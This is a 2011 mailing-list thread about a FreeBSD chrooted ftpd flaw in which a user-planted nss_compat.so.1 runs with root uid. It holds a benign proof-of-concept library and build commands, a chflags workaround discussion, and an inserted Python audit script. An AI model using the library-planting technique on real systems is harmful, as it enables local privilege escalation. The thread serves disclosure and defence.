Saw this on FD... Anyone know any more details about this?

http://lists.grok.org.uk/pipermail/full-disclosure/2011-November/084372.html

---Mike

--
-------------------
Mike Tancsa, tel +1 519 651 3400
Sentex Communications, mike@sentex.net
Providing Internet services since 1994 www.sentex.net
Cambridge, Ontario Canada http://www.tancsa.com/
> Saw this on FD... Anyone know any more details about this?
> http://lists.grok.org.uk/pipermail/full-disclosure/2011-November/084372.html

This is a well known hazard of chrooting to directories controlled by unprivileged users. In this case, the vulnerability exists because ftpd calls /bin/ls with uid=0 and euid!=0 when the STAT command is issued, and nss_compat.so is loaded by libc regardless of elevated privileges.

This can be proven by creating a dummy ~/lib/nss_compat.so.1:

[venglin@lagoon ~/lib]$ cat dummy.c
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>   /* declares getuid() and geteuid() (missing in the original listing) */

/* Runs at library load time, i.e. when libc pulls in nss_compat.so.1 */
void _init()
{
	FILE *fp = fopen("asdf", "w+");
	fprintf(fp, "%d %d\n", getuid(), geteuid());
	fclose(fp);
}
[venglin@lagoon ~/lib]$ cc -o dummy.o -c dummy.c -fPIC
[venglin@lagoon ~/lib]$ cc -shared -Wl,-soname,dummy.so -o dummy.so dummy.o -nostartfiles
[venglin@lagoon ~/lib]$ mv dummy.so nss_compat.so.1

And after calling the STAT command:

[venglin@lagoon ~/lib]$ cat ~/asdf
0 3000

BTW. This vulnerability affects only configurations where /etc/ftpchroot exists or the anonymous user is allowed to create files inside the etc and lib dirs.

--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com ** NICHDL: PMF9-RIPE *
* Jabber ID: venglin@nette.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ5JIV *
On Fri, Dec 9, 2011 at 12:04 AM, <gabor@zahemszky.hu> wrote:
> Hi!
>
> Are the following steps enough to prevent me?
>
> # for user in user1 user2 .... ; do
> mkdir -p ~$user/lib ~$user/usr/lib ~$user/etc
> chflags sunlink,schg ~$user/lib ~$user/usr ~$user/usr/lib ~$user/etc
> done
> #

Yes, that should be a sufficient workaround.

Cheers,
--
Xin LI <delphij@delphij.net> https://www.delphij.net/
FreeBSD - The Power to Serve! Live free or die
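The messages above describe the hazard (a chrooted, privileged ftpd helper resolving nss_compat.so.1 and its configuration from directories the user owns) and a workaround (pre-create lib, usr/lib and etc under each chroot and mark them schg). The audit script below is an added example written for this thread, not code from any of the posters or from FreeBSD. It checks, for one chroot directory and one uid, only the three subdirectories the workaround names: whether each exists, whether it carries the immutable flag (on BSD systems that expose st_flags), whether the chrooted user could otherwise write into it, and whether a user-owned shared object is already sitting there. The demo() helper builds a constructed, deliberately unprotected home directory in a temp dir so the script runs anywhere; everything it reports about that layout is synthetic.

```python
import os
import shutil
import stat
import tempfile

# Subdirectories of the chroot named by the thread as the places the chrooted
# /bin/ls resolves libraries and nsswitch data from.
SENSITIVE_DIRS = ("etc", "lib", "usr/lib")


def _is_immutable(st):
    # st_flags exists only on BSD-derived systems; chflags schg sets SF_IMMUTABLE.
    # On Linux the attribute is absent and the check simply reports "not immutable".
    flags = getattr(st, "st_flags", 0)
    return bool(flags & getattr(stat, "SF_IMMUTABLE", 0))


def _user_can_write(st, uid):
    # Conservative rule: the user can write if they own the directory and the
    # owner write bit is set, or if the directory is world-writable.
    mode = st.st_mode
    if st.st_uid == uid and mode & stat.S_IWUSR:
        return True
    return bool(mode & stat.S_IWOTH)


def audit_chroot(root, uid):
    """Audit one chroot directory for the user identified by uid.

    Returns a list of (path, reason) findings. An empty list means every
    directory in SENSITIVE_DIRS exists, is a real directory, and the user
    cannot plant files in it (either it is schg or they lack write access).
    """
    findings = []
    for rel in SENSITIVE_DIRS:
        path = os.path.join(root, rel)
        try:
            st = os.lstat(path)
        except FileNotFoundError:
            # Missing directory inside a user-owned home: the user can create it.
            findings.append((path, "missing: user could create it"))
            continue
        if not stat.S_ISDIR(st.st_mode):
            # A symlink or file here is not the protected directory the
            # workaround expects.
            findings.append((path, "not a directory"))
            continue
        if _is_immutable(st):
            continue  # schg present: the workaround is in place for this dir
        if _user_can_write(st, uid):
            findings.append((path, "writable by uid %d and not schg" % uid))
        # Detection side: report shared objects the user already owns here.
        for name in sorted(os.listdir(path)):
            fst = os.lstat(os.path.join(path, name))
            if ".so" in name and fst.st_uid == uid:
                findings.append((os.path.join(path, name), "user-owned shared object"))
    return findings


def demo():
    """Constructed example: an unprotected home-directory chroot.

    Builds lib/ and etc/ owned by the current user (usr/lib deliberately
    missing) and drops an empty nss_compat.so.1 into lib/, then audits it
    for the current euid and removes the temp tree.
    """
    base = tempfile.mkdtemp(prefix="ftpchroot-audit-")
    try:
        me = os.geteuid()
        for rel in ("lib", "etc"):
            os.makedirs(os.path.join(base, rel))
            os.chmod(os.path.join(base, rel), 0o755)  # owner-writable, as a fresh mkdir would be
        with open(os.path.join(base, "lib", "nss_compat.so.1"), "wb"):
            pass
        return audit_chroot(base, me)
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    for path, reason in demo():
        print("%s: %s" % (path, reason))
```

Against a real chroot you would call audit_chroot on each user's home with that user's uid (for example from pwd.getpwnam), and treat any finding as the workaround not being fully in place. The script answers only "are the three named directories protected?"; it does not claim that no other path inside the chroot could matter.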
09.12.2011 15:25, Xin LI wrote:
> On Fri, Dec 9, 2011 at 12:04 AM, <gabor@zahemszky.hu> wrote:
>> Hi!
>>
>> Are the following steps enough to prevent me?
>>
>> # for user in user1 user2 .... ; do
>> mkdir -p ~$user/lib ~$user/usr/lib ~$user/etc
>> chflags sunlink,schg ~$user/lib ~$user/usr ~$user/usr/lib ~$user/etc
>> done
>> #
>
> Yes that should be sufficient workaround.

Why /lib and /usr/lib only?

Eugene Grosbein
On Fri, 09 Dec 2011 15:39:15 +0700, Eugene Grosbein wrote:
> 09.12.2011 15:25, Xin LI wrote:
>> On Fri, Dec 9, 2011 at 12:04 AM, <gabor@zahemszky.hu> wrote:
>>> Hi!
>>>
>>> Are the following steps enough to prevent me?
>>>
>>> # for user in user1 user2 .... ; do
>>> mkdir -p ~$user/lib ~$user/usr/lib ~$user/etc
>>> chflags sunlink,schg ~$user/lib ~$user/usr ~$user/usr/lib
>>> ~$user/etc
>>> done
>>> #
>>
>> Yes that should be sufficient workaround.
>
> Why /lib and /usr/lib only?

??? /lib, /usr/lib and /etc.

Which directory is missing?

Gábor < Gabor at Zahemszky dot HU >
09.12.2011 19:24, gabor@zahemszky.hu wrote:
> On Fri, 09 Dec 2011 15:39:15 +0700, Eugene Grosbein wrote:
>> 09.12.2011 15:25, Xin LI wrote:
>>> On Fri, Dec 9, 2011 at 12:04 AM, <gabor@zahemszky.hu> wrote:
>>>> Hi!
>>>>
>>>> Are the following steps enough to prevent me?
>>>>
>>>> # for user in user1 user2 .... ; do
>>>> mkdir -p ~$user/lib ~$user/usr/lib ~$user/etc
>>>> chflags sunlink,schg ~$user/lib ~$user/usr ~$user/usr/lib
>>>> ~$user/etc
>>>> done
>>>> #
>>>
>>> Yes that should be sufficient workaround.
>>
>> Why /lib and /usr/lib only?
>
> ??? /lib, /usr/lib and /etc.
>
> Which directory is missing?

I do not know and therefore ask. What guarantees that no other directory may be used to load a library from?

Eugene Grosbein